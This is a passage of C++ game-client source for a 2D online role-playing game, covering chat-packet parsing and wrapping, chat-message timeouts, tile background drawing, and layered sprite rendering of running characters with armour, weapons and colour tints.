 WORD * wp;
 BOOL bFlag;

 char cHeadMsg[200];

	dwTime = m_dwCurTime;

	ZeroMemory(cTxt1, sizeof(cTxt1));
	ZeroMemory(cTxt2, sizeof(cTxt2));
	ZeroMemory(cMsg, sizeof(cMsg));

	wp = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	iObjectID = (int)*wp;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	sp = (short *)cp;
	sX = *sp;
	cp += 2;

	sp = (short *)cp;
	sY = *sp;
	cp += 2;
	ZeroMemory(cName, sizeof(cName));
	memcpy(cName, (char *)cp, 10);
	cp += 10;

	cMsgType = *cp;
	cp++;

	if (bCheckExID(cName) == TRUE) return;

	ZeroMemory(cTemp, sizeof(cTemp));
	strcpy(cTemp, cp);

	if( (cMsgType==0) || (cMsgType==2) || (cMsgType==3) )
	{	if( m_Misc.bCheckIMEString(cTemp)==FALSE ) return;
	}
	if( !m_bWhisper )
	{	if( cMsgType == 20 ) return;
	}
	if( !m_bShout )
	{	if( cMsgType == 2 || cMsgType == 3 ) return;
	}

	ZeroMemory(cMsg, sizeof(cMsg));
	wsprintf(cMsg, "%s: %s", cName, cTemp);
	m_DDraw._GetBackBufferDC();
	bFlag = FALSE;
	short sCheckByte = 0;
	while (bFlag == FALSE)
	{	iLoc = m_Misc.iGetTextLengthLoc(m_DDraw.m_hDC, cMsg, 305);
		for( int i=0 ; i<iLoc ; i++ ) if( cMsg[i] < 0 ) sCheckByte ++;
		if (iLoc == 0)
		{	PutChatScrollList(cMsg, cMsgType);
			bFlag = TRUE;
		}else
		{	if ((sCheckByte%2)==0)
			{	ZeroMemory(cTemp, sizeof(cTemp));
				memcpy(cTemp, cMsg, iLoc);
				PutChatScrollList(cTemp, cMsgType);
				ZeroMemory(cTemp, sizeof(cTemp));
				strcpy(cTemp, cMsg +iLoc );
				ZeroMemory(cMsg, sizeof(cMsg));
				strcpy(cMsg, " ");
				strcat(cMsg, cTemp);
			}else
			{	ZeroMemory(cTemp, sizeof(cTemp));
				memcpy(cTemp, cMsg, iLoc+1);
				PutChatScrollList(cTemp, cMsgType);
				ZeroMemory(cTemp, sizeof(cTemp));
				strcpy(cTemp, cMsg +iLoc+1);
				ZeroMemory(cMsg, sizeof(cMsg));
				strcpy(cMsg, " ");
				strcat(cMsg, cTemp);
	}	}	}

	m_DDraw._ReleaseBackBufferDC();

	_RemoveChatMsgListByObjectID(iObjectID);

	for (i = 1; i < DEF_MAXCHATMSGS; i++)
	if (m_pChatMsgList[i] == NULL) {
		m_pChatMsgList[i] = new class CMsg(1, (char *)(cp), dwTime);
		m_pChatMsgList[i]->m_iObjectID = iObjectID;

		if (m_pMapData->bSetChatMsgOwner(iObjectID, sX, sY, i) == FALSE) {
			delete m_pChatMsgList[i];
			m_pChatMsgList[i] = NULL;
		}

		if ( (cMsgType != 0) && (m_bIsDialogEnabled[10] != TRUE) ) {
			ZeroMemory(cHeadMsg, sizeof(cHeadMsg));
			wsprintf(cHeadMsg, "%s: %s", cName, cp);
			AddEventList(cHeadMsg, cMsgType);
		}
		return;
	}
}

void CGame::ReleaseTimeoverChatMsg()
{int i;
 DWORD dwTime;
	dwTime = G_dwGlobalTime;
	for ( i = 1; i < DEF_MAXCHATMSGS; i++)
	if (m_pChatMsgList[i] != NULL) {

		if ((m_pChatMsgList[i]->m_cType >= 1) && (m_pChatMsgList[i]->m_cType <= 20)) {
			if ((dwTime - m_pChatMsgList[i]->m_dwTime) > DEF_CHATTIMEOUT_A) {
				delete m_pChatMsgList[i];
				m_pChatMsgList[i] = NULL;
			}
		}
		else
		if ((m_pChatMsgList[i]->m_cType >= 21) && (m_pChatMsgList[i]->m_cType <= 40)) {
			if ((dwTime - m_pChatMsgList[i]->m_dwTime) > DEF_CHATTIMEOUT_B) {
				delete m_pChatMsgList[i];
				m_pChatMsgList[i] = NULL;
			}
		}
		else
		if ((m_pChatMsgList[i]->m_cType >= 41) && (m_pChatMsgList[i]->m_cType <= 60)) {
			if ((dwTime - m_pChatMsgList[i]->m_dwTime) > DEF_CHATTIMEOUT_C) {
				delete m_pChatMsgList[i];
				m_pChatMsgList[i] = NULL;
			}
		}
		else if ((dwTime - m_pChatMsgList[i]->m_dwTime) > DEF_CHATTIMEOUT_A) {
			delete m_pChatMsgList[i];
			m_pChatMsgList[i] = NULL;
		}
	}
}

void CGame::DrawBackground(short sDivX, short sModX, short sDivY, short sModY)
{
 int indexX, indexY, ix, iy;
 short sSpr, sSprFrame;

#ifdef RES_HIGH
	if (sDivX < 0 || sDivY < 0) return ;
	if ((m_bIsRedrawPDBGS == TRUE) || (m_iPDBGSdivX != sDivX) || (m_iPDBGSdivY != sDivY)) {
		// Pre-Draw Background Surface
		m_bIsRedrawPDBGS = FALSE;
		m_iPDBGSdivX = sDivX;
		m_iPDBGSdivY = sDivY;
		SetRect(&m_DDraw.m_rcClipArea, 0,0, 800+32, 600+32);
		indexY = sDivY+m_pMapData->m_sPivotY;
		for (iy = -sModY; iy < 600 + 48; iy += 32)
		{
			indexX = sDivX+m_pMapData->m_sPivotX;
			for (ix = -sModX; ix < 800+48 ; ix += 32)
			{	sSpr      = m_pMapData->m_tile[indexX][indexY].m_sTileSprite;
				sSprFrame = m_pMapData->m_tile[indexX][indexY].m_sTileSpriteFrame;
				m_pTileSpr[sSpr]->PutSpriteFastNoColorKeyDst(m_DDraw.m_lpPDBGS, ix - 16 +sModX, iy - 16 +sModY, sSprFrame, m_dwCurTime);
				//Grid - by luqah
				if (m_bGrid)m_pSprite[DEF_SPRID_INTERFACE_ND_GRID]->PutSpriteFastDst(m_DDraw.m_lpPDBGS, ix - 16 +sModX, iy - 16 +sModY, 17, m_dwCurTime);
				indexX++;
			}
			indexY++;
		}
		SetRect(&m_DDraw.m_rcClipArea, 0,0, 800, 600);
	}
	RECT rcRect;
	SetRect(&rcRect, sModX, sModY, 800+sModX, 600+sModY); // our fictitious sprite bitmap is
	m_DDraw.m_lpBackB4->BltFast( 0, 0, m_DDraw.m_lpPDBGS, &rcRect, DDBLTFAST_NOCOLORKEY | DDBLTFAST_WAIT);
	if( m_bIsCrusadeMode )
	{	if(m_iConstructLocX != -1) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_CRUSADE, m_iConstructLocX*32 - m_sViewPointX, m_iConstructLocY*32 - m_sViewPointY, 41);
		if( m_iTeleportLocX != -1) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_CRUSADE, m_iTeleportLocX*32 - m_sViewPointX, m_iTeleportLocY*32 - m_sViewPointY, 42);
	}
#else
 	if (sDivX < 0 || sDivY < 0) return ;
	if ((m_bIsRedrawPDBGS == TRUE) || (m_iPDBGSdivX != sDivX) || (m_iPDBGSdivY != sDivY)) {
		// Pre-Draw Background Surface
		m_bIsRedrawPDBGS = FALSE;
		m_iPDBGSdivX = sDivX;
		m_iPDBGSdivY = sDivY;
		SetRect(&m_DDraw.m_rcClipArea, 0,0, 640+32, 480+32);
		indexY = sDivY+m_pMapData->m_sPivotY;
		for (iy = -sModY; iy < 427+48 ; iy += 32)
		{
			indexX = sDivX+m_pMapData->m_sPivotX;
			for (ix = -sModX; ix < 640+48 ; ix += 32)
			{	sSpr      = m_pMapData->m_tile[indexX][indexY].m_sTileSprite;
				sSprFrame = m_pMapData->m_tile[indexX][indexY].m_sTileSpriteFrame;
				m_pTileSpr[sSpr]->PutSpriteFastNoColorKeyDst(m_DDraw.m_lpPDBGS, ix - 16 +sModX, iy - 16 +sModY, sSprFrame, m_dwCurTime);
				//Grid - by luqah
				if (m_bGrid)m_pSprite[DEF_SPRID_INTERFACE_ND_GRID]->PutSpriteFastDst(m_DDraw.m_lpPDBGS, ix - 16 +sModX, iy - 16 +sModY, 17, m_dwCurTime);
				indexX++;
			}
			indexY++;
		}
		SetRect(&m_DDraw.m_rcClipArea, 0,0, 640, 480);
	}
	RECT rcRect;
	SetRect(&rcRect, sModX, sModY, 640+sModX, 480+sModY); // our fictitious sprite bitmap is
	m_DDraw.m_lpBackB4->BltFast( 0, 0, m_DDraw.m_lpPDBGS, &rcRect, DDBLTFAST_NOCOLORKEY | DDBLTFAST_WAIT);
	if( m_bIsCrusadeMode )
	{	if(m_iConstructLocX != -1) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_CRUSADE, m_iConstructLocX*32 - m_sViewPointX, m_iConstructLocY*32 - m_sViewPointY, 41);
		if( m_iTeleportLocX != -1) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_CRUSADE, m_iTeleportLocX*32 - m_sViewPointX, m_iTeleportLocY*32 - m_sViewPointY, 42);
	}
#endif
}

BOOL CGame::DrawObject_OnRun(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{
	int dx, dy;
	int iBodyIndex, iHairIndex, iUndiesIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iWeaponIndex, iShieldIndex, iHelmIndex, iR, iG, iB, iMantleIndex;
	BOOL bInv = FALSE;
	int iWeaponGlare, iShieldGlare;
	int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
	int iSkirtDraw = 0;

	if (_tmp_sOwnerType == 35) bInv = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{
		iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor = 0;
		iMantleColor = 0;
		iArmColor = 0;
		iPantsColor = 0;
		iBootsColor = 0;
		iHelmColor = 0;
	}
	else
	{
		iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ((_tmp_iStatus & 0x10) != 0)
	{
		if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (_iGetFOE(_tmp_iStatus) == 1) bInv = TRUE;
		else return FALSE;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		iBodyIndex = 500 + (_tmp_sOwnerType - 1) * 8 * 15 + (4 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F) * 15 + 4;
		iHairIndex = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8) * 15 + 4;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{
			if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12) * 15 + 4;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F) * 15 + 4;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8) * 15 + 4;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12) * 15 + 4;
		if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
			iWeaponIndex = -1;
		else
		{
			iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4) * 64 + 8 * 6 + (_tmp_cDir - 1);
		}
		if ((_tmp_sAppr2 & 0x000F) == 0)
			iShieldIndex = -1;
		else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F) * 8 + 6;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8) * 15 + 4;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4) * 15 + 4;
		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		iBodyIndex = 500 + (_tmp_sOwnerType - 1) * 8 * 15 + (4 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F) * 15 + 4;
		iHairIndex = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8) * 15 + 4;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{
			if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12) * 15 + 4;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F) * 15 + 4;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8) * 15 + 4;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12) * 15 + 4;
		if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
			iWeaponIndex = -1;
		else
		{
			iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4) * 64 + 8 * 6 + (_tmp_cDir - 1);
		}
		if ((_tmp_sAppr2 & 0x000F) == 0)
			iShieldIndex = -1;
		else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F) * 8 + 6;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8) * 15 + 4;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4) * 15 + 4;
		break;

	default:
		iUndiesIndex = -1;
		iHairIndex = -1;
		iArmArmorIndex = -1;
		iBodyArmorIndex = -1;
		iPantsIndex = -1;
		iBootsIndex = -1;
		iMantleIndex = -1;
		iHelmIndex = -1;
		break;
	}
	dx = 0;
	dy = 0;
	switch (_tmp_cDir) {
	case 1: dy = 28 - (_tmp_cFrame << 2); break;
	case 2: dy = 28 - (_tmp_cFrame << 2); dx = (_tmp_cFrame << 2) - 28; break;
	case 3: dx = (_tmp_cFrame << 2) - 28; break;
	case 4: dx = (_tmp_cFrame << 2) - 28; dy = (_tmp_cFrame << 2) - 28; break;
	case 5: dy = (_tmp_cFrame << 2) - 28; break;
	case 6: dy = (_tmp_cFrame << 2) - 28; dx = 28 - (_tmp_cFrame << 2); break;
	case 7: dx = 28 - (_tmp_cFrame << 2); break;
	case 8: dx = 28 - (_tmp_cFrame << 2); dy = 28 - (_tmp_cFrame << 2); break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX + dx, sY + dy, _tmp_cFrame);

	if (_tmp_iEffectType != 0)
	{
		switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX + dx, sY + dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX + dx, sY + dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
		}
	}

	if (bTrans == FALSE)
	{
		CheckActiveAura(sX + dx, sY + dy, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{
			if (iWeaponIndex != -1)
			{
				if (bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX + dx, sY + dy, _tmp_cFrame, dwTime);
				else
				{
					if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX + dx, sY + dy, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_wWR[iWeaponColor] - m_wR[0], m_wWG[iWeaponColor] - m_wG[0], m_wWB[iWeaponColor] - m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
			}

			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere

			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{
					if (sX < 50)
						m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX + dx, sY + dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX + dx, sY + dy, _tmp_cFrame, dwTime);
				}
				break;
			}

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX + dx, sY + dy, _tmp_cFrame, dwTime);
			else
			{
				if ((_tmp_iStatus & 0x40) != 0)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_wR[10] - m_wR[0] / 2, m_wG[10] - m_wG[0] / 2, m_wB[10] - m_wB[0] / 2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX + dx, sY + dy, _tmp_cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 0))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}

			if (iUndiesIndex != -1)
			{
				if (bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{
				_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{
				if (bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iBootsColor] - m_wR[0], m_wG[iBootsColor] - m_wG[0], m_wB[iBootsColor] - m_wB[0], dwTime);
				}
			}

			if (iPantsIndex != -1)
			{
				if (bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iPantsColor] - m_wR[0], m_wG[iPantsColor] - m_wG[0], m_wB[iPantsColor] - m_wB[0], dwTime);
				}
			}

			if (iArmArmorIndex != -1)
			{
				if (bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iArmColor] - m_wR[0], m_wG[iArmColor] - m_wG[0], m_wB[iArmColor] - m_wB[0], dwTime);
				}
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{
				if (bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iBootsColor] - m_wR[0], m_wG[iBootsColor] - m_wG[0], m_wB[iBootsColor] - m_wB[0], dwTime);
				}
			}

			if (iBodyArmorIndex != -1)
			{
				if (bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iArmorColor] - m_wR[0], m_wG[iArmorColor] - m_wG[0], m_wB[iArmorColor] - m_wB[0], dwTime);
				}
			}

			if (iHelmIndex != -1)
			{
				if (bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iHelmColor == 0)
						m_pSprite[iHelmIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iHelmColor] - m_wR[0], m_wG[iHelmColor] - m_wG[0], m_wB[iHelmColor] - m_wB[0], dwTime);
				}
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 2))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}

			if (iShieldIndex != -1)
			{
				if (bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iShieldColor] - m_wR[0], m_wG[iShieldColor] - m_wG[0], m_wB[iShieldColor] - m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX - 13 + dx, sY - 34 + dy, 0, dwTime); // GM effect
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 1))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}
		}
		else
		{
			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere

			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{
					if (sX < 50)
						m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX + dx, sY + dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX + dx, sY + dy, _tmp_cFrame, dwTime);
				}
				break;
			}

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite2(sX + dx, sY + dy, _tmp_cFrame, dwTime);
			else
			{
				if ((_tmp_iStatus & 0x40) != 0)
					m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX + dx, sY + dy, _tmp_cFrame, m_wR[10] - m_wR[0] / 2, m_wG[10] - m_wG[0] / 2, m_wB[10] - m_wB[0] / 2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX + dx, sY + dy, _tmp_cFrame, dwTime);
			}

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);


			if ((iMantleIndex != -1) && (_cMantleDrawingOrderOnRun[_tmp_cDir] == 0))
			{
				if (bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				else
				{
					if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, m_wR[iMantleColor] - m_wR[0], m_wG[iMantleColor] - m_wG[0], m_wB[iMantleColor] - m_wB[0], dwTime);
				}
			}

			if (iUndiesIndex != -1)
			{
				if (bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
				m_pSprite[iUndiesIndex]->PutSpriteFast(sX + dx, sY + dy, (_tmp_cDir - 1) * 8 + _tmp_cFrame, dwTime);
			}

